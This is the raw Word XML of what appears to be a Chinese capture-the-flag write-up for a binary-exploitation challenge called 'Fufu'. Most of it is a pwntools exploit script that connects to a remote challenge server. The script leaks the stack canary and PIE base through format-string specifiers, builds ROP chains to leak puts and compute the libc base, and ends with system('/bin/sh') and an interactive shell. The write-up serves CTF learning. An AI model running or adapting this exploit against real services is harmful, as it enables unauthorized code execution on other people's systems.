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1A068BD7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807724">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@qq</w:t>
      </w:r>
      <w:r w:rsidR="00807724">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="3F4B3691" w:rsidR="00AF064E" w:rsidRDefault="00C54C0F" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="007F4252" w:rsidRPr="007F4252">
        <w:t>Fufu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5558FC6D" w14:textId="3D4F39D0" w:rsidR="00807724" w:rsidRPr="00807724" w:rsidRDefault="00807724" w:rsidP="00807724">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807724">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>格式化字符串泄露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 xml:space="preserve"> pie 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>、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 xml:space="preserve"> canary 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>地址允许攻击者读取和修改内存通过泄露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 xml:space="preserve"> canary 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>值绕过栈保护机制利用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 xml:space="preserve"> ret2libc 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>技术执行系统命令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 xml:space="preserve">system("/bin/sh\x00") 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>拿获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00807724">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250D1311" w14:textId="77777777" w:rsidR="00807724" w:rsidRDefault="00807724" w:rsidP="00807724">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20516F74" w14:textId="77777777" w:rsidR="00807724" w:rsidRPr="00807724" w:rsidRDefault="00807724" w:rsidP="00807724">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEDF441" w14:textId="77777777" w:rsidR="00807724" w:rsidRDefault="00807724" w:rsidP="00807724">
      <w:pPr>
        <w:pStyle w:val="a8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0FB6ACD9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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11B401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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38338CE4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2CB0CA7D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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE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</w:p>
    <w:p w14:paraId="1554F814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77BDC27F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设置日志级别为调试模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB7AEC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context.log_level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'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10078215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0B162B03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连接远程服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CBB39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p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remote(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'101.200.155.151'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12600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08276F33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6BE1A3CF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第一阶段：泄露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canary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值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A562373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'Furina: Your choice? &gt;&gt; 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59AD84E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'1'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006906E6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'Furina: Time is limited! &gt;&gt; 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83A61DF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'2147483648'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2C98A51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'Furina: Present your evidence! &gt;&gt; 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8CC39A4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"%17$p"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DCC17DA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canary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(p.recv(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18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).strip(), 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16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49BBE6C7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f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"[+] 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泄露的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canary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值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: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{</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(canary)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}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48913F60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073932F9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lastRenderedPageBreak/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第二阶段：泄露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PIE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基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38653FEB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'hcy want to eat chicken! &gt;&gt; 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F51DC76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'1'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2283564A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'Furina: Your choice? &gt;&gt; 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239209EF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'1'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493E061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'Furina: Time is limited! &gt;&gt; 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2813B8D0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'2147483648'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7A5D9A8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'Furina: Present your evidence! &gt;&gt; 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09BD08E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"%25$p"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049CBF37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main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(p.recv(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14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).strip(), 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16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0C605C7A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pie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main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1338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C87056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f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"[+] PIE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基址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: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{</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(pie)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}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0F8A800B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4F5ECF95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第三阶段：泄露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puts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函数地址并计算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libc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基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E59B4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'hcy want to eat chicken! &gt;&gt; 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FD4084F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'1'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44FA834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6EF493DA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准备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ROP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链相关地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8FE8B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ret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000000000000101a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pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9E726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pop_rdi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000000000000132f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pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03156FAE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puts_got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3fa0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pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A15A3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puts_plt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1030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pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD0D98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7D8F68F7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'Furina: Your choice? &gt;&gt; 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01BAC964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'2'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75CCA5F7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'Furina: The trial is adjourned'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4707EE1E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1646C958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构造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ROP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链泄露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puts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真实地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A703A5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rop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cyclic(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48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p64(canary)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p64(pop_rdi)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p64(puts_got)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p64(puts_plt)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p64(main)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643A025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p.sendline(rop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B635EB1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5E348F6E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解析泄露的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puts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地址并计算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libc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基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F54CA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p.recv(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  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消耗掉不需要的字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47149D74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puts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.from_bytes(p.recv(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6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).ljust(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8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1528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00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), 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'little'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7CE93D55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f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"[+] puts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函数地址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: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{</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(puts)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}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AE2F00D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libc_base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puts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080e50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FD41B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f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"[+] libc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基址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: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{</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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(libc_base)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}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318B7D2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7650CCFA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第四阶段：获取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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D47CEC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bin_sh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1d8678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libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C92501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system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050d70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libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D64D6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7A325EE6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'Furina: Your choice? &gt;&gt; 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796F92BD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lastRenderedPageBreak/>
        <w:t>p.sendline(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'2'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485D6029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p.recvuntil(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528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Furina: The trial is adjourned'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413ED658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22B1B275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构造最终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ROP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链执行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system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617E6BB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rop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cyclic(</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE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48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p64(canary)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p64(ret)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1528FE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p64(pop_rdi)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p64(bin_sh) </w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE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p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB5E90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p.sendline(rop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6790DB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632CF387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获取交互式</w:t>
      </w:r>
      <w:r w:rsidRPr="001528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E87774E" w14:textId="77777777" w:rsidR="001528FE" w:rsidRPr="001528FE" w:rsidRDefault="001528FE" w:rsidP="001528F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528FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D67E38" w14:textId="74C39EF9" w:rsidR="00807724" w:rsidRPr="00807724" w:rsidRDefault="00807724" w:rsidP="001528FE"/>
    <w:sectPr w:rsidR="00807724" w:rsidRPr="008077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AF8D6" w14:textId="77777777" w:rsidR="000C40DC" w:rsidRDefault="000C40DC" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DB1897A" w14:textId="77777777" w:rsidR="000C40DC" w:rsidRDefault="000C40DC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03257" w14:textId="77777777" w:rsidR="000C40DC" w:rsidRDefault="000C40DC" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="39C2C123" w14:textId="77777777" w:rsidR="000C40DC" w:rsidRDefault="000C40DC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8C02B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D138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0C40DC"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001528FE"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004148F7"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="007325A7"/>
    <w:rsid w:val="007F4252"/>
    <w:rsid w:val="00807724"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B25A25"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C54C0F"/>
    <w:rsid w:val="00CD7DCC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807724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2025-05-16T19:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>